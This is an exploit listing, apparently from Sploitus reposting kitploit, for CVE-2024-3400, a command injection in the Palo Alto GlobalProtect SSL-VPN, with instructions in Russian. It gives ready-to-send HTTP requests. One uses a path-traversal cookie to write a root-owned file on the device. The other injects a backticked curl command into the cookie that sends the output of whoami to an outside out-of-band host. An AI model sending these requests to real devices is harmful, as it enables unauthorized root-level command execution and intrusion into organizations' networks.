Sploitus

Exploit for CVE-2024-3400

kitploit · 2026-09-04

Exploit Code

MARKDOWN41 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-H4X0R-DZ-CVE-2024-3400
# CVE-2024-3400

CVE-2024-3400 Инъекция команд ОС Palo Alto

отправьте этот HTTP-запрос:

root@kitploit:~
    
    
    POST /ssl-vpn/hipreport.esp HTTP/1.1
    Host: 127.0.0.1
    Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/hellome1337.txt;
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0
    

![image](https://assets.kitploit.com/production/public/readmes/26235/bc9e35e8bc45439b2d55ca37f4a611196676ecae4b123269401eb97df5e13635.png)

вы создадите файл hellome1337.txt на сервере с root-доступом

теперь если вы попытаетесь получить доступ к файлам, вы должны получить 403 вместо 404

![image](https://assets.kitploit.com/production/public/readmes/26235/c35e037e5bd91795c089bda5bf75722f54b0b17a1687663e8ed6ba31ab9559cc.png)

### Инъекция команд

root@kitploit:~
    
    
    POST /ssl-vpn/hipreport.esp HTTP/1.1
    Host: 127.0.01
    Cookie: SESSID=./../../../opt/panlogs/tmp/device_telemetry/minute/h4`curl${IFS}xxxxxxxxxxxxxxxxx.oast.fun?test=$(whoami)`;
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 0
    
    

Дополнительная информация: https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis